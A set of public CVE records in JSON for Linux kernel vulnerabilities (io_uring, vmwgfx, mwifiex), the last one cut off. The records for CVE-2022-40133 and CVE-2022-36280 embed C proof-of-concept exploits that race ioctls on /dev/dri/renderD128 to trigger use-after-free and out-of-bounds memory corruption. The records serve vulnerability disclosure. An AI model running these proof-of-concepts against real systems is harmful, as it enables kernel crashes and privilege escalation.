            "url": "https://kernel.dance/#1a623d361ffe5cecd4244a02f449528416360038"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220629-0004/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.4.189",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            },
            {
              "lessThan": "unspecified",
              "status": "affected",
              "version": "5.4.24",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Bing-Jhong Billy Jheng \u003cbilly@starlabs.sg\u003e"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Integer Overflow or Wraparound vulnerability in io_uring of Linux Kernel allows local attacker to cause memory corruption and escalate privileges to root. This issue affects: Linux Kernel versions prior to 5.4.189; version 5.4.24 and later versions."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-190",
              "description": "CWE-190 Integer Overflow or Wraparound",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-06-29T18:06:37",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/fs/io_uring.c?h=v5.4.189\u0026id=1a623d361ffe5cecd4244a02f449528416360038"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://kernel.dance/#1a623d361ffe5cecd4244a02f449528416360038"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20220629-0004/"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@google.com",
          "ID": "CVE-2022-1116",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_value": "5.4.189"
                          },
                          {
                            "version_affected": "\u003e=",
                            "version_value": "5.4.24"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Bing-Jhong Billy Jheng \u003cbilly@starlabs.sg\u003e"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Integer Overflow or Wraparound vulnerability in io_uring of Linux Kernel allows local attacker to cause memory corruption and escalate privileges to root. This issue affects: Linux Kernel versions prior to 5.4.189; version 5.4.24 and later versions."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-190 Integer Overflow or Wraparound"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/fs/io_uring.c?h=v5.4.189\u0026id=1a623d361ffe5cecd4244a02f449528416360038",
              "refsource": "MISC",
              "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/fs/io_uring.c?h=v5.4.189\u0026id=1a623d361ffe5cecd4244a02f449528416360038"
            },
            {
              "name": "https://kernel.dance/#1a623d361ffe5cecd4244a02f449528416360038",
              "refsource": "MISC",
              "url": "https://kernel.dance/#1a623d361ffe5cecd4244a02f449528416360038"
            },
            {
              "name": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/167386/Kernel-Live-Patch-Security-Notice-LSN-0086-1.html"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20220629-0004/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20220629-0004/"
            }
          ]
        },
        "source": {
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2022-1116",
    "datePublished": "2022-05-17T16:50:11",
    "dateReserved": "2022-03-28T00:00:00",
    "dateUpdated": "2024-08-02T23:55:23.656Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-40133
Vulnerability from cvelistv5
Published
2022-09-06 00:00
Modified
2024-08-03 12:14
Severity
Summary
There is an UAF vulnerability in vmwgfx driver
References
Impacted products
VendorProduct
Linuxkernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T12:14:39.687Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.13.0-52*",
              "status": "affected",
              "version": "v4.20-rc1",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
        }
      ],
      "datePublic": "2022-09-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_execbuf_tie_context\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\nint cid=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int sid,int cid){   \nint cmd[0x1000]={0};\ncmd[0]=1148;\ncmd[1]=0x50;\ncmd[2]=0;\ncmd[3]=1;\ncmd[4]=sid;\ncmd[5]=10;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2;  \n\targ.context_handle=cid;\n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"poc failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[0];         \n}\n\n\n\nvoid destory_context(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x40086448, \u0026arg) == -1)\n                {\n                        printf(\"destory_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }       \n}\nvoid thread1(){\nwhile(1){\ncid = alloc_context(); \ndestory_context(cid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(sid,cid);  \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n    \n\ninit();\nsid=create_surface();\n\n\n        if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n                perror(\"thread_create\");\n        }\n\n\t\n              if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n                perror(\"thread_create\");\n        }\n        \n        while(1){\n        sleep(3);\n        \n        }\n\n\n}\n  \n"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-09-09T14:39:51",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075"
        }
      ],
      "source": {
        "defect": [
          "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075"
        ],
        "discovery": "INTERNAL"
      },
      "title": "There is an UAF vulnerability in vmwgfx driver",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "AKA": "Anolis",
          "ASSIGNER": "security@openanolis.org",
          "DATE_PUBLIC": "2022-09-06T07:00:00.000Z",
          "ID": "CVE-2022-40133",
          "STATE": "PUBLIC",
          "TITLE": "There is an UAF vulnerability in vmwgfx driver"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003e=",
                            "version_name": "5.13.0-52",
                            "version_value": "v4.20-rc1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_execbuf_tie_context\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
            }
          ]
        },
        "exploit": [
          {
            "lang": "en",
            "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\nint cid=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int sid,int cid){   \nint cmd[0x1000]={0};\ncmd[0]=1148;\ncmd[1]=0x50;\ncmd[2]=0;\ncmd[3]=1;\ncmd[4]=sid;\ncmd[5]=10;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2;  \n\targ.context_handle=cid;\n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"poc failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[0];         \n}\n\n\n\nvoid destory_context(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x40086448, \u0026arg) == -1)\n                {\n                        printf(\"destory_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }       \n}\nvoid thread1(){\nwhile(1){\ncid = alloc_context(); \ndestory_context(cid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(sid,cid);  \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n    \n\ninit();\nsid=create_surface();\n\n\n        if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n                perror(\"thread_create\");\n        }\n\n\t\n              if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n                perror(\"thread_create\");\n        }\n        \n        while(1){\n        sleep(3);\n        \n        }\n\n\n}\n  \n"
          }
        ],
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-416 Use After Free"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075",
              "refsource": "MISC",
              "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075"
            }
          ]
        },
        "source": {
          "defect": [
            "https://bugzilla.openanolis.cn/show_bug.cgi?id=2075"
          ],
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2022-40133",
    "datePublished": "2022-09-06T00:00:00",
    "dateReserved": "2022-09-07T00:00:00",
    "dateUpdated": "2024-08-03T12:14:39.687Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2019-14815
Vulnerability from cvelistv5
Published
2019-11-25 10:51
Modified
2024-08-05 00:26
Severity
Summary
A vulnerability was found in Linux Kernel, where a Heap Overflow was found in mwifiex_set_wmm_params() function of Marvell Wifi Driver.
Impacted products
VendorProduct
Linuxkernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T00:26:38.908Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/torvalds/linux/commit/7caac62ed598a196d6ddf8d9c121e12e082cac3a"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/security/cve/cve-2019-14815"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14815"
          },
          {
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://www.openwall.com/lists/oss-security/2019/08/28/1"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://lore.kernel.org/linux-wireless/20190828020751.13625-1-huangwenabc%40gmail.com"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20200103-0001/"
          },
          {
            "name": "RHSA-2020:0174",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0174"
          },
          {
            "name": "RHSA-2020:0328",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0328"
          },
          {
            "name": "RHSA-2020:0339",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0339"
          },
          {
            "name": "[debian-lts-announce] 20200302 [SECURITY] [DLA 2114-1] linux-4.9 security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in Linux Kernel, where a Heap Overflow was found in mwifiex_set_wmm_params() function of Marvell Wifi Driver."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-122",
              "description": "CWE-122",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-03-02T19:06:57",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/torvalds/linux/commit/7caac62ed598a196d6ddf8d9c121e12e082cac3a"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://access.redhat.com/security/cve/cve-2019-14815"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14815"
        },
        {
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://www.openwall.com/lists/oss-security/2019/08/28/1"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://lore.kernel.org/linux-wireless/20190828020751.13625-1-huangwenabc%40gmail.com"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20200103-0001/"
        },
        {
          "name": "RHSA-2020:0174",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0174"
        },
        {
          "name": "RHSA-2020:0328",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0328"
        },
        {
          "name": "RHSA-2020:0339",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0339"
        },
        {
          "name": "[debian-lts-announce] 20200302 [SECURITY] [DLA 2114-1] linux-4.9 security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2019-14815",
    "datePublished": "2019-11-25T10:51:15",
    "dateReserved": "2019-08-10T00:00:00",
    "dateUpdated": "2024-08-05T00:26:38.908Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-36280
Vulnerability from cvelistv5
Published
2022-09-09 00:00
Modified
2024-08-03 10:00
Severity
Summary
There is an out-of-bounds write vulnerability in vmwgfx driver
Impacted products
VendorProduct
Linuxkernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T10:00:04.335Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071"
          },
          {
            "name": "DSA-5324",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5324"
          },
          {
            "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html"
          },
          {
            "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.13.0-52*",
              "status": "affected",
              "version": "v3.2-rc1",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
        }
      ],
      "datePublic": "2022-09-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int handle,int sid){\nchar *vaddr=(unsigned long)mmap(NULL,\n               0x2000,\n                PROT_READ | PROT_WRITE,\n                MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */,\n-1, 0);\n\t\n\t if (mlock((void *)vaddr, 0x2000) == -1) {\n                printf(\"[-] failed to lock memory (%s), aborting!\\n\",\n                        strerror(errno));\n                        }\n                        \n          memset(vaddr,\"a\",0x2000);     \nint cmd[0x1000]={0};\ncmd[0]=1044;\ncmd[1]=0x50;\ncmd[2]=handle;\ncmd[3]=0;\ncmd[5]=sid;\ncmd[6]=0;\ncmd[7]=0;\ncmd[13]=1;\ncmd[12]=0x2000;\ncmd[14]=1;\ncmd[19]=12;\nstruct drm_vmw_execbuf_arg 